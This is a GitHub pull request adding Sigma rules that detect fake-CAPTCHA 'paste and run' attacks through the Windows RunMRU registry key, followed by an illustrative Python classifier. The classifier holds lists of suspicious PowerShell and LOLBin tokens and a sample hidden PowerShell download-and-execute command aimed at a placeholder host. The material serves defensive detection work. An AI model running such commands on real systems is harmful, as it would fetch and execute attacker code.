
Added Fake CAPTCHA Campaign new rules #5058

Open · wants to merge 2 commits into master

Conversation

ahmedfarou22 (Contributor)

Summary of the Pull Request

Many threat actors have been using the Fake CAPTCHA to trick their victims into pasting malicious PowerShell commands into the Windows Run dialog.

I added 2 new rules:

  1. A detection rule that looks for suspicious PowerShell commands in the RunMRU registry key. This key stores executions from the Run dialog.

  2. A threat hunting rule that looks for any suspicious commands in the RunMRU key. This is to detect cases where the threat actor is not using PowerShell, or uses the same fake CAPTCHA technique with a different approach. This rule has a high false positive rate because it is a hunting rule.

More details are mentioned in my blog.

Changelog

new: Suspicious PowerShell Commands in RunMRU key
new: Suspicious Commands in RunMRU key (Threat hunting)

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions
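To make the two rule ideas above concrete, here is an added example (not the PR's own Sigma rules and not SigmaHQ code) that applies the same two-tier logic to constructed Sysmon Event ID 13 (registry value set) records. The `RunMRU` key path and the trailing `\1` that Explorer appends to each Run-dialog entry are real Windows behaviour; the indicator lists `SUSPICIOUS_PS_TOKENS` and `HUNTING_TOKENS` are assumptions chosen for this example, not the selections used by the actual rules.

```python
"""Toy RunMRU classifier: mirrors the detection-vs-hunting split of the PR.

Tier "high": a Run-dialog entry that launches PowerShell with a suspicious
option (hidden window, encoded command, download cradle, ...).
Tier "hunting": any other Run-dialog entry that looks like a command or URL;
noisy by design, meant for triage rather than alerting.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU holds the
# history of what was typed into the Windows Run dialog (Win+R).
RUNMRU_MARKER = "\\currentversion\\explorer\\runmru\\"

# Assumed indicator lists for this example (the real rules define their own).
POWERSHELL_BINARIES = ("powershell", "pwsh")
SUSPICIOUS_PS_TOKENS = (
    "-w hidden", "-windowstyle hidden", "-enc", "-ep bypass",
    "-executionpolicy bypass", "iex", "invoke-expression",
    "invoke-webrequest", "downloadstring", "frombase64string",
)
HUNTING_TOKENS = (
    "http", "mshta", "cmd", "curl", "wscript", "cscript",
    "rundll32", "regsvr32", "bitsadmin", "certutil",
)


@dataclass
class RegistryEvent:
    """Minimal view of a Sysmon Event ID 13 (RegistryEvent, value set)."""
    event_id: int
    target_object: str   # full registry path including the value name
    details: str         # the data written to the value


def run_dialog_entry(event: RegistryEvent) -> Optional[str]:
    """Return the command typed into Run, or None if this is not a RunMRU write."""
    if event.event_id != 13 or RUNMRU_MARKER not in event.target_object.lower():
        return None
    value_name = event.target_object.rsplit("\\", 1)[-1]
    if value_name.upper() == "MRULIST":   # ordering index, not a command
        return None
    cmd = event.details
    if cmd.endswith("\\1"):               # Explorer appends "\1" to every entry
        cmd = cmd[:-2]
    return cmd


def classify(event: RegistryEvent) -> Optional[str]:
    """Return "high", "hunting" or None for a single registry event."""
    cmd = run_dialog_entry(event)
    if cmd is None:
        return None
    low = cmd.lower()
    if any(b in low for b in POWERSHELL_BINARIES) and any(t in low for t in SUSPICIOUS_PS_TOKENS):
        return "high"
    if any(t in low for t in HUNTING_TOKENS):
        return "hunting"
    return None


def analyze(events: List[RegistryEvent]) -> List[Tuple[str, str]]:
    """Return (value name, tier) for every event that matches either tier."""
    hits = []
    for event in events:
        tier = classify(event)
        if tier:
            hits.append((event.target_object.rsplit("\\", 1)[-1], tier))
    return hits


# Constructed sample events (placeholder SID and example.invalid hostnames).
_KEY = "HKU\\S-1-5-21-111-222-333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\"
SAMPLE_EVENTS = [
    RegistryEvent(13, _KEY + "a", "notepad\\1"),                                   # benign
    RegistryEvent(13, _KEY + "b",
                  r'powershell -w hidden -ep bypass -c "iex(irm https://example.invalid/a)"\1'),  # detection tier
    RegistryEvent(13, _KEY + "c", r"mshta https://example.invalid/b\1"),          # hunting tier only
    RegistryEvent(13, _KEY + "MRUList", "cba"),                                    # ordering value, skipped
    RegistryEvent(13, "HKU\\S-1-5-21-111-222-333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden",
                  "DWORD (0x00000001)"),                                           # unrelated key
]

if __name__ == "__main__":
    for name, tier in analyze(SAMPLE_EVENTS):
        print(f"RunMRU\\{name}: {tier}")
```

The split matters operationally: the first tier can page an analyst, while the second tier belongs in a scheduled hunt where the expected false positives (administrators genuinely typing `cmd` or a URL into Run) are reviewed in bulk.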

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Oct 21, 2024
@ahmedfarou22 (Contributor, Author)

Quick side note:
In Red Canary's latest blog post, Intelligence Insights: October 2024, they referred to this technique as "Paste and run".

Summary from their latest blog (paste and run):
The "paste and run" technique, often called "ClickFix" (coined by Proofpoint), is a malicious tactic observed since early 2024. Attackers use it to trick users into copying and executing PowerShell code by disguising it as a "fix" to access content. Lures include phishing prompts for access fixes or fake CAPTCHAs on compromised websites. For example, a fake CAPTCHA instructs users to click an “I’m not a robot” button, which silently copies malicious code to their clipboard, followed by steps to paste and run it, unknowingly executing the attack.
